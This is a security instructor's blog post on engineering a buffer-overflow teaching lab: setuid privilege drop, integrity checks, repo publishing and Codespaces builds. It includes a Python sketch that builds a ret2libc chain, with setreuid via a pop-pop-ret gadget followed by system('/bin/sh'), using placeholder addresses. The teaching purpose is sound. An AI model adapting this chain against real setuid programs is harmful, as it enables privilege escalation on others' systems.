Shipping a Buffer Overflow Lab, v2

I teach introductory computer security at CSULB, and every semester the buffer-overflow lab is the one students remember. Not because it’s the hardest — it isn’t — but because it’s the first time the abstract threat model in the textbook becomes a shell prompt they earned. This spring I shipped v2, and what started as “let me clean this up over an afternoon” consumed two full working days and taught me a few things worth writing down.

Three Concepts Instead of Two

The original lab was essentially a modern restatement of Aleph One’s 1996 article “Smashing the Stack for Fun and Profit”: overflow a stack buffer, overwrite the saved instruction pointer, redirect execution. Classic. v1 added NX bypass via ret2libc (Solar Designer, 1997), which is a meaningful step up. v2 adds a third concept that the classic literature underplays: setuid privilege drop and re-elevation.

The setup: the vulnerable binary runs setuid. Students exploit it expecting to land a root shell. Except they don’t — at least not naively — because dash calls setuid(getuid()) at startup whenever the effective UID differs from the real UID. On Linux, when EUID ≠ RUID, the saved-set-UID drops with that call and there is no shell-side recovery path. This is not a bug in dash; it’s a deliberate security measure. It’s also exactly the kind of thing that makes “works in the tutorial, fails on the real binary” a rite of passage in exploit development.
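The drop is easy to reason about as a pure function on the credential pair. What follows is a toy model of the behavior described above, not dash's actual source; the `Creds` type, `shell_startup`, and both UID values are hypothetical names chosen for illustration.

```python
from typing import NamedTuple


class Creds(NamedTuple):
    ruid: int  # real UID: who launched the process
    euid: int  # effective UID: whose privileges it currently holds


def shell_startup(creds: Creds) -> Creds:
    """Toy model of the shell's startup check (an assumption, not dash's code)."""
    if creds.euid != creds.ruid:
        # In the spirit of setuid(getuid()): fall back to the real UID.
        return Creds(ruid=creds.ruid, euid=creds.ruid)
    return creds


STUDENT_UID = 1000  # hypothetical
OWNER_UID = 1001    # hypothetical owner of the setuid binary

# Naive exploit: the shell starts with RUID=student, EUID=owner.
naive = shell_startup(Creds(ruid=STUDENT_UID, euid=OWNER_UID))

# Both UIDs already match, so the shell has nothing to drop.
matched = shell_startup(Creds(ruid=OWNER_UID, euid=OWNER_UID))

print(naive)
print(matched)
```

In this model the naive path ends up with the student's own UID on both sides, which is exactly the "I got a shell but not the privileges" surprise.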

The fix forces re-elevation before the shell starts. For the direct shellcode path, the code does a geteuid / setreuid dance so that RUID == EUID == the oracle’s UID by the time execve runs. For the ret2libc chain, there’s a setreuid call staged via a pop-pop-ret gadget before system("/bin/sh") fires. Students working the harder challenge (Omega) have to find that gadget in libc themselves — their first real taste of ROP-style gadget hunting, closer to CTF territory than anything in v1.
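For the ret2libc variant, the stack layout is the whole trick, so here is a rough sketch of how such a chain could be assembled. It assumes a 32-bit x86 target with stack-passed arguments (which is what a pop-pop-ret gadget implies); every address, the offset, and the UID below are made-up placeholders, not values from the lab.

```python
import struct


def p32(value: int) -> bytes:
    """Pack a 32-bit little-endian word."""
    return struct.pack("<I", value)


def build_chain(offset: int, setreuid_addr: int, pop_pop_ret: int,
                system_addr: int, exit_addr: int, binsh_addr: int,
                uid: int) -> bytes:
    chain = b"A" * offset        # filler up to the saved return address
    chain += p32(setreuid_addr)  # first return target: setreuid(uid, uid)
    chain += p32(pop_pop_ret)    # setreuid returns here; gadget pops both args
    chain += p32(uid)            # setreuid arg 1: new real UID
    chain += p32(uid)            # setreuid arg 2: new effective UID
    chain += p32(system_addr)    # the gadget's ret lands in system()
    chain += p32(exit_addr)      # return address for system()
    chain += p32(binsh_addr)     # system arg: pointer to "/bin/sh"
    return chain


# All values below are hypothetical placeholders.
chain = build_chain(
    offset=76,
    setreuid_addr=0xF7E9A110,
    pop_pop_ret=0xF7E2B43E,
    system_addr=0xF7E4C850,
    exit_addr=0xF7E3F9D0,
    binsh_addr=0xF7F6CA0B,
    uid=1001,
)
print(len(chain), chain[76:].hex())
```

The gadget exists only to step the stack pointer past the two `setreuid` arguments so that the next `ret` picks up `system`. In a real run the addresses would come from the leak, not from constants.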

One other quiet change: strcpy became memcpy in the vulnerable function. Small UIDs produce NUL bytes in the seed-derived values that strcpy would truncate, silently breaking the copy. The unbounded copy is still the bug; only the copy primitive changed.
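A small simulation makes the truncation concrete. This sketch assumes the UID is embedded as a 32-bit little-endian word; `c_strcpy` and `c_memcpy` are hypothetical Python stand-ins for the C semantics, and the UID is an arbitrary example.

```python
import struct


def c_strcpy(src: bytes) -> bytes:
    """Model strcpy: copy up to, but not including, the first NUL byte."""
    end = src.find(b"\x00")
    return src if end == -1 else src[:end]


def c_memcpy(src: bytes, n: int) -> bytes:
    """Model memcpy: copy exactly n bytes, NULs included."""
    return src[:n]


uid = 1001  # hypothetical small UID; 0x000003E9 has two zero bytes
packed_uid = struct.pack("<I", uid)
payload = b"A" * 8 + packed_uid + b"B" * 8

via_strcpy = c_strcpy(payload)
via_memcpy = c_memcpy(payload, len(payload))

print(packed_uid.hex())
print(len(via_strcpy), len(via_memcpy))
```

Everything after the UID's first zero byte never reaches the destination under `strcpy`, so the tail of the payload silently disappears.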

The Leak-Then-Pwn Integrity Problem

v1’s cross-seed integrity check rested on a shaky premise: “an exploit hardcoded to seed A fails on seed B.” That’s true for naive exploits, but the lab teaches a leak-then-pwn technique that makes exploits universal by design — the binary tells you what you need to know, and you use it. Once students internalize that, the hardcoded-offset approach collapses as a uniqueness guarantee.

v2 rethinks this entirely. The new integrity model has two parts:

1. Flag uniqueness: the per-student honor flags are verified to be pairwise unique across the entire seed corpus. No two students get the same flag.
2. Portability sample: build seed A’s reference exploit, run it against seed B, and assert it captures seed B’s flag, not A’s. That’s the correct behavior; the exploit adapts, but the flag it retrieves is still unique to each student.

It’s a cleaner model because it tests what actually matters: that submitting someone else’s work produces the wrong flag.
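The two checks could be sketched roughly as follows. The flag derivation here (an HMAC over the seed with an instructor key) is purely an assumption for illustration, as are the names `derive_flag`, `assert_flags_unique`, and `portability_check`; the exploit runner is passed in as a callable because the real one launches a binary.

```python
import hashlib
import hmac
from typing import Callable, Iterable

SECRET = b"hypothetical-instructor-key"  # assumption, not the lab's scheme


def derive_flag(seed: str) -> str:
    digest = hmac.new(SECRET, seed.encode(), hashlib.sha256).hexdigest()
    return "FLAG{" + digest[:16] + "}"


def assert_flags_unique(seeds: Iterable[str]) -> None:
    """Part 1: no two seeds in the corpus may share a flag."""
    seen: dict[str, str] = {}
    for seed in seeds:
        flag = derive_flag(seed)
        if flag in seen:
            raise AssertionError(f"{seen[flag]!r} and {seed!r} share a flag")
        seen[flag] = seed


def portability_check(run_exploit: Callable[[str, str], str],
                      seed_a: str, seed_b: str) -> None:
    """Part 2: A's exploit, run against B, must capture B's flag, not A's."""
    captured = run_exploit(seed_a, seed_b)
    assert captured == derive_flag(seed_b), "exploit did not adapt to target"
    assert captured != derive_flag(seed_a), "exploit leaked its own seed's flag"


def fake_runner(built_for: str, target: str) -> str:
    # Stand-in for the real harness: a leak-then-pwn exploit reads
    # what it needs from the target, so it returns the target's flag.
    return derive_flag(target)


seeds = [f"student-{n:03d}" for n in range(200)]
assert_flags_unique(seeds)
portability_check(fake_runner, seeds[0], seeds[1])
print("integrity checks passed")
```

A runner that returned seed A's flag regardless of target would trip the first assertion in `portability_check`, which is the failure the old hardcoded-offset premise could not detect.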

The Repo Split

This is the engineering I’m most satisfied with. The development repo contains the reference exploits, the cross-seed soak harness, instructor notes, and all the machinery I use to grade and verify the lab. None of that belongs in student hands. The old approach (keeping everything in one repo and hoping nobody explored the git history) was fine when I was the only person who ever cloned it, but is not fine for a GitHub Classroom template.

The solution is a release-sync script. At publish time it:

1. Checks out a signed release tag in the dev repo.
2. Assembles a clean student-facing tree using an explicit allowlist, so only the files students are meant to have are copied.
3. Runs a pre-flight scan over the staged tree and refuses to publish if it finds any INSTRUCTOR-ONLY markers.
4. Initializes a fresh git repo (one commit, no history), signs and tags it, and pushes it to the separate public repo that GitHub Classroom uses as its template.
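The allowlist and pre-flight steps above are the part worth sketching, since they are what actually keeps instructor material out. This is a minimal illustration, not the real script: the function names, file names, and directory layout are all hypothetical, and the git steps (tag checkout, fresh init, signing, push) are left out entirely.

```python
import shutil
import tempfile
from pathlib import Path

MARKER = "INSTRUCTOR-ONLY"


def stage_tree(src: Path, dst: Path, allowlist: list[str]) -> None:
    """Copy only allowlisted paths; anything not named is never staged."""
    for rel in allowlist:
        target = dst / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(src / rel, target)


def preflight_scan(staged: Path) -> list[str]:
    """Return staged files that still contain the instructor marker."""
    offenders = []
    for path in sorted(staged.rglob("*")):
        if path.is_file() and MARKER in path.read_text(errors="ignore"):
            offenders.append(str(path.relative_to(staged)))
    return offenders


def demo() -> tuple[list[str], list[str]]:
    with tempfile.TemporaryDirectory() as tmp:
        dev, staged = Path(tmp) / "dev", Path(tmp) / "staged"
        (dev / "solutions").mkdir(parents=True)
        staged.mkdir()
        (dev / "README.md").write_text("Student instructions\n")
        (dev / "vuln.c").write_text("/* INSTRUCTOR-ONLY: grading hint */\n")
        (dev / "solutions" / "exploit.py").write_text("# reference exploit\n")

        stage_tree(dev, staged, ["README.md", "vuln.c"])
        files = sorted(str(p.relative_to(staged))
                       for p in staged.rglob("*") if p.is_file())
        return files, preflight_scan(staged)


staged_files, offenders = demo()
print("staged:", staged_files)
print("blocked by:", offenders)
```

The two layers catch different mistakes: the allowlist stops whole files from leaking, while the scan catches an allowlisted file that still carries instructor-only content. A publish step would abort whenever `offenders` is non-empty.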

Forking from a private branch was the obvious alternative, and I rejected it: forks copy the entire commit history. Even if the branch doesn’t exist anymore, the objects do. The clean-init approach gives students a repo with exactly one commit containing exactly the files on the allowlist. Nothing else reachable.

A Note on Codespaces Hygiene

The lab delivers via GitHub Codespaces, and the per-student seed — which determines libc layout, leaked addresses, and the honor flag — is baked in at container build time. This created a new source of confusion worth calling out explicitly in the lab instructions: stop the Codespace, don’t delete it.

Stopping suspends the VM; it resumes instantly with all work intact. Deleting it wipes the disk, forces a full rebuild, and invalidates the student’s prior work, because the newly built container has a different seed. A student who deletes their Codespace midway through effectively has to start over. I added a prominent warning, the kind you’d put on a piece of equipment that has a “this is not the off switch” button.

I also fixed a Docker cache-thrashing bug in the same pass: ARG SEED was declared near the top of the Dockerfile, so every RUN instruction after it missed the cache whenever the seed changed. Every per-seed build was re-running roughly 1 GB of apt installs. Deferring the declaration to right before first use means the heavy layer is shared across all seeds.
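To see why the position of the ARG matters, here is a deliberately simplified model of layer caching. It is not Docker's actual algorithm: it only assumes that each layer's cache key chains off its parent and that a RUN step's key also depends on the build-arg values in scope. The instruction strings, including the base image, are hypothetical.

```python
import hashlib


def layer_keys(instructions: list[str], build_args: dict[str, str]) -> list[str]:
    """Toy cache keys: chained hashes, with in-scope ARG values mixed into RUN."""
    keys, parent, in_scope = [], "", {}
    for ins in instructions:
        op, _, rest = ins.partition(" ")
        if op == "ARG":
            in_scope[rest] = build_args.get(rest, "")
        material = parent + "|" + ins
        if op == "RUN":
            material += "|" + repr(sorted(in_scope.items()))
        parent = hashlib.sha256(material.encode()).hexdigest()
        keys.append(parent)
    return keys


def shared_layers(instructions: list[str], seed_a: str, seed_b: str) -> int:
    """Count leading layers that two per-seed builds could share."""
    a = layer_keys(instructions, {"SEED": seed_a})
    b = layer_keys(instructions, {"SEED": seed_b})
    count = 0
    for x, y in zip(a, b):
        if x != y:
            break
        count += 1
    return count


APT = "RUN apt-get install -y toolchain"  # stands in for the ~1 GB layer
EARLY = ["FROM ubuntu:22.04", "ARG SEED", APT, "RUN ./build.sh"]
LATE = ["FROM ubuntu:22.04", APT, "ARG SEED", "RUN ./build.sh"]

early_shared = shared_layers(EARLY, "seed-a", "seed-b")
late_shared = shared_layers(LATE, "seed-a", "seed-b")
print(early_shared, late_shared)
```

In the early layout the shared prefix ends before the apt step, so each seed rebuilds it. In the late layout the apt step sits inside the shared prefix and only the final seed-dependent step differs.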

The Smoke-Alarm Insight

The release sequence was a cascade: three patches, each one exposing the next downstream check. The funniest moment was the last one. The autograder kept failing on the template repository itself, and for a few minutes that looked like a bug. It isn’t. The template ships a placeholder writeup; the autograder computes the expected honor flag at runtime from the seed and gates on it. A failing honor-check on the template is the canonical proof that the detector works.

I wrote “smoke-alarm energy” in my notes: you want it to go off when you wave a match under it. The failure mode is the validation. If the template passed cleanly, that would mean the autograder wasn’t checking anything, which would be the actual bug.
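The gate itself can be sketched in a few lines. As before, the HMAC-based derivation, the key, the placeholder text, and the function names are assumptions made for illustration; the only thing taken from the lab is the shape of the check, which computes the expected flag from the seed at runtime and compares it with what the writeup contains.

```python
import hashlib
import hmac

GRADER_KEY = b"hypothetical-grader-key"   # assumption
PLACEHOLDER = "FLAG{replace-me}"          # hypothetical template writeup value


def expected_flag(seed: str) -> str:
    digest = hmac.new(GRADER_KEY, seed.encode(), hashlib.sha256).hexdigest()
    return "FLAG{" + digest[:16] + "}"


def honor_check(seed: str, submitted: str) -> bool:
    """Pass only if the submitted flag matches the one derived from the seed."""
    want = expected_flag(seed).encode()
    got = submitted.strip().encode()
    return hmac.compare_digest(want, got)


template_result = honor_check("template-seed", PLACEHOLDER)
student_result = honor_check("student-042", expected_flag("student-042"))
copied_result = honor_check("student-042", expected_flag("student-007"))

print(template_result, student_result, copied_result)
```

The template failing and the copied flag failing are the same property seen from two angles: the check only passes for the flag that belongs to the seed it is run against.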

The bigger payoff from this ship is the platform itself. The themed “mainframe” aesthetic — custom banner, MOTD, man pages, prompt — is now fully exercised as a Codespaces-only delivery vehicle with a clean public/private repo split and a release-sync script I can reuse for future labs. The next time I want to add a new concept to the course, the scaffolding is already there. That’s the part that makes the two-day overrun feel like an investment rather than a slip.